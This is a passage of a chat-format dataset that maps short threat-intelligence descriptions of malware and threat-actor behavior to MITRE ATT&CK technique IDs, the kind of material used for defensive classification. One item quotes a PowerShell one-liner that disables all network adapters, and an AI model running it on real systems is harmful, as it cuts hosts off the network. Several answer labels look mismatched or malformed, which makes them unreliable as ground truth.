- "content": "Transparent Tribe has directed users to open URLs hosting malicious content."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FinFisher obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list in order to check for sandbox/virtualized environments."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NotPetya drops PsExec with the filename dllhost.dat."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used various forms of spearphishing in attempts to get users to open links or attachments."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fysbis can perform keylogging."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Raindrop used a custom packer for its Cobalt Strike payload, which was compressed using the LZMA algorithm."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Decrypting the Configuration As previously mentioned, the real configuration data is stored in the first stage shellcode but it is not stored in cleartext, but encrypted and compressed"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Frankenstein has run a command script to set up persistence as a scheduled task named \"WinUpdate\", as well as other encoded commands from the command-line."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WastedLocker aims to encrypt the files of the infected host. However before the encryption procedure runs, WastedLocker performs a few other tasks to ensure the ransomware will run properly"
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAFNIUM has used ASCII encoding for C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can use process hollowing for execution."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses Base64 encoding for communication in the message body of an HTTP request."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has deployed backup web shells and obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network."
- },
- {
- "role": "assistant",
- "content": "T1108 - Redundant Access"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We had previously observed this same IP scanning for TCP port 7001 throughout May 2018. This was potentially a scan for Oracle WebLogic servers, which listens on TCP port 7001 by default. In both our samples, as well as the ones that Morpheus Labs described, the hard-coded password was not only identical, but also located at the same offset"
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor has automatically collected data about the compromised system."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda APT uses a package of binaries to load the actual payload and it is intentionally designed this way to bypass file scanners and sandboxes. Obviously, file scanners or sandboxes can’t detect the PlugX payload without the encrypted DAT file"
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet could be dropping malware with Remote Access Trojan (RAT) capabilities damaging the integrity of the overall network. After reviewing systems for Emotet indicators, reimage and move clean systems to a containment VLAN, segregated from the infected network. It is possible that the Outlook account may now have rules to auto-forward all emails to an external email address, which could result in a data breach. Search base64 encoded network stream data referencing the organization’s email domain. If references are found, perform additional analysis to see if a data breach has occurred"
- },
- {
- "role": "assistant",
- "content": "T1114.001 - Email Collection: Local Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the malware starts it tries to reach a hardcoded C2. The communication takes place using the unmodified HTTP-based protocol, the request and response body are RC4-encrypted, and the encryption key is also hardcoded into the sample"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Meteor can disconnect all network adapters on a compromised host using `powershell -Command \"Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($.NetEnabled) { $.Disable() } }\" > NUL`."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a command to collect the victim PC name and operating system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the victim’s computer name, processor architecture, OS version, and volume serial number."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has a HWP document stealer module which changes the default program association in the registry to open HWP documents."
- },
- {
- "role": "assistant",
- "content": "T1546.001 - Event Triggered Execution: Change Default File Association"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The script sets up a new HTTP object and then tries to disable the system's local proxy settings"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "httpclient uses HTTP for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has exfiltrated stolen data to Dropbox using a customized version of dbxcli."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Squirrelwaffle has used HTTP POST requests for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GreyEnergy modifies conditions in the Registry and adds keys."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FELIXROOT checks for installed security software like antivirus and firewall."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bandook can detect USB devices."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gorgon Group has obtained and used tools such as QuasarRAT and Remcos."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In order to encrypt network shares, BitPaymer will attempt to enumerate the sessions for each user logged onto the infected host and create a new process, using the token of each user. These new processes will first spawn a net.exe processing with the view argument to gather a list of network accessible hosts. For each host, BitPaymer spawns another net.exe process with command net view <host> using the newly discovered host as a parameter. This will return a list of network shares available to the impersonated user on the host. Once a list of all available shares has been gathered, BitPaymer attempts to mount them to be encrypted"
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery', 'T1134.001 - Access Token Manipulation: Token Impersonation/Theft"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Xbash can use scripts to invoke PowerShell to download a malicious PE executable or PE DLL for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The use of the web bug reconnaissance technique suggests TA416 is being more discerning about which targets the group chooses to deliver malware payloads. Historically, the group primarily delivered web bug URLs alongside malware URLs to confirm receipt. In 2022, the group started to first profile users and then deliver malware URLs. This may be an attempt by TA416 to avoid having their malicious tools discovered and publicly disclosed. By narrowing the lens of targeting from broad phishing campaigns to focus on targets that have proven to be active and willing to open emails, TA416 increases its chance of success when following up with malicious malware payloads"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "According to the server’s code, the default command that it would issue to newly infected systems was a batch script contained in a file named 0000000000.bat"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoisonIvy creates a Registry key in the Active Setup pointing to a malicious executable."
- },
- {
- "role": "assistant",
- "content": "T1547.014 - Active Setup"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CosmicDuke exfiltrates collected files automatically over FTP to remote servers."
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The other infection chain involves an attached .XLS file containing an Excel formula that utilizes a PowerShell command (Figure 2) to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command (Figure 3)."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1566.001 - Phishing: Spearphishing Attachment', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shamoon has used HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clop can use code signing to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware communicates to its command server using HTTP with an encrypted payload."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT has exfiltrated data over the C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT checked the size of the hard drive to determine if it was being run in a sandbox environment. In the event of sandbox detection, it would delete itself by overwriting the malware scripts with the contents of \"License.txt\" and exiting."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can create a task named to appear benign."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy has a built-in utility command for \"netstat\", can do net session through PowerView, and has an interactive shell which can be used to discover additional information."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back."
- },
- {
- "role": "assistant",
- "content": "T1104 - Multi-Stage Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ComRAT can check the default browser by querying \"HKCR\\http\\shell\\open\\command\"."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackTech has used built-in API functions."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One interesting thing to note is that the Keybase account used by the attacker to chat with their victims has the same logo of the Pay2Key EOSIO smart contract system"
- },
- {
- "role": "assistant",
- "content": "T1585 - Establish Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has attempted to get users to launch malicious Microsoft Word attachments delivered via spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The C2 server sends back Base64 encoded response"
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla surveys a system upon check-in to discover Group Policy details using the \"gpresult\" command."
- },
- {
- "role": "assistant",
- "content": "T1615 - Group Policy Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mosquito can launch PowerShell Scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MoonWind obtains the victim IP address."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Comnie uses RC4 and Base64 to obfuscate strings."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obtains the victim IP address."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains base64-encoded strings."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors have used and a modified version of called Wrapikatz to dump credentials. They have also dumped credentials from domain controllers."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may create a file containing the results of the command cmd.exe /c net user {Username}."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Honeybee, threat actors ran \"sc start\" to start the COMSysApp as part of the service hijacking and \"sc stop\" to stop and reconfigure the COMSysApp."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has tested malware samples to determine AV detection and subsequently modified the samples to ensure AV evasion."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has used spearphishing emails with malicious attachments to initially compromise victims."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAFNIUM has used web shells to export mailbox data."
- },
- {
- "role": "assistant",
- "content": "T1114.002 - Email Collection: Remote Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious payload associated with the campaign appears to be a new version of Zeus Panda, a banking trojan designed to stealing banking and other sensitive credentials for exfiltration by attackers. The overall operation of the Zeus Panda banking trojan has been well documented, however Talos wanted to provide additional information about the first stage packer used by the malware. The malware will first query the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects the any of the following keyboard mappings"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has used PowerShell to add and delete rules in the Windows firewall."
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Javali has used embedded VBScript to download malicious payloads from C2."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used VBS scripts throughout its operations."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has sent system information to its C2 server using HTTP."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Honeybee, stolen data was copied into a text file using the format `From (- --).txt` prior to compression, encoding, and exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crutch can exfiltrate data over the primary C2 channel (Dropbox HTTP API)."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It continues to perform a number of checks for installed security products on the victim machine. The following security platforms are queried by checking entries within the HKLM\\Software\\ registry path"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WINDSHIELD C2 traffic can communicate via TCP raw sockets."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has automatically collected mouse clicks, continuous screenshots on the machine, and set timers to collect the contents of the clipboard and website browsing."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windshift has used e-mail attachments to lure victims into executing malicious code."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes."
- },
- {
- "role": "assistant",
- "content": "T1029 - Scheduled Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Javali has achieved execution through victims clicking links to malicious websites."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackTech has used the SNScan tool to find other potential targets on victim networks."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
